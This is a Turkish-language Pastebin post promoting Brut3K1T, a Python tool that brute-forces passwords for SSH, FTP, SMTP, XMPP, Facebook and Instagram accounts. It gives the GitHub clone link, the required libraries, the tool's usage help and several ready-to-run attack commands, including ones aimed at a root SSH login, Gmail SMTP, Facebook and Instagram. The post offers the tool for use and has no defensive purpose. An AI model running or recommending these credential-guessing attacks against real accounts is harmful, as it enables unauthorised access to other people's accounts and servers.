Advertisement
KingSkrupellos

Brut3K1T Sunucu Destekli SSH FTP SMTP FaceBook Kırıcı Python

Sep 14th, 2017
633
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.65 KB | None | 0 0
  1. Brut3K1T Sunucu Destekli SSH FTP SMTP FaceBook Kırıcı Pytho
  2.  
  3. [video=youtube]https://www.youtube.com/watch?v=Tp5QGm6JZls[/video]
  4.  
  5. [img]http://i.hizliresim.com/nRl2ol.png[/img]
  6.  
  7. Neleri Destekliyor =>
  8.  
  9. [code]ssh
  10. ftp
  11. smtp
  12. XMPP
  13. instagram
  14. facebook[/code]
  15.  
  16. Yüklenmesi Gereken Malzemeler =>
  17.  
  18. argparse - utilized for parsing command line arguments
  19. paramiko - utilized for working with SSH connections and authentication
  20. ftplib - utilized for working with FTP connections and authentication
  21. smtplib - utilized for working with SMTP (email) connections and authentication
  22. fbchat - utilized for connecting with Facebook
  23. selenium - utilized for web scraping, which is used with Instagram (and later Twitter)
  24. xmppy - utiized for XMPP connections ...and more within the future!
  25.  
  26. Yada yükleme için kısaca =>
  27.  
  28. [code]git clone https://github.com/ex0dus-0x/brut3k1t[/code]
  29.  
  30. Bilgisayarımızdaki İşletim Sistemi Windows yada Linux üzerine Yüklemeye Başlıyalım =>
  31.  
  32. [code]cd /path/to/brut3k1t[/code]
  33.  
  34. Asıl Yardımcı Kodlar =>
  35.  
  36. [code]usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
  37. [-p PORT] [-d DELAY]
  38.  
  39. Server-side bruteforce module written in Python
  40.  
  41. optional arguments:
  42. -h, --help show this help message and exit
  43. -a ADDRESS, --address ADDRESS
  44. Provide host address for specified service. Required
  45. for certain protocols
  46. -p PORT, --port PORT Provide port for host address for specified service.
  47. If not specified, will be automatically set
  48. -d DELAY, --delay DELAY
  49. Provide the number of seconds the program delays as
  50. each password is tried
  51.  
  52. required arguments:
  53. -s SERVICE, --service SERVICE
  54. Provide a service being attacked. Several protocols
  55. and services are supported
  56. -u USERNAME, --username USERNAME
  57. Provide a valid username for service/protocol being
  58. executed
  59. -w PASSWORD, --wordlist PASSWORD
  60. Provide a wordlist or directory to a wordlist[/code]
  61.  
  62.  
  63. Command Line cmd.exe'de Nasıl Kullanılır
  64.  
  65. [code]python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt[/code]
  66.  
  67. [code]python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3[/code]
  68.  
  69. [code]python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt[/code]
  70.  
  71. [code]python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt[/code]
  72.  
  73. [code]python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5[/code]
  74.  
  75. indirme Linki =>
  76.  
  77. [hide][code]https://github.com/ex0dus-0x/brut3k1t[/code][/hide]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement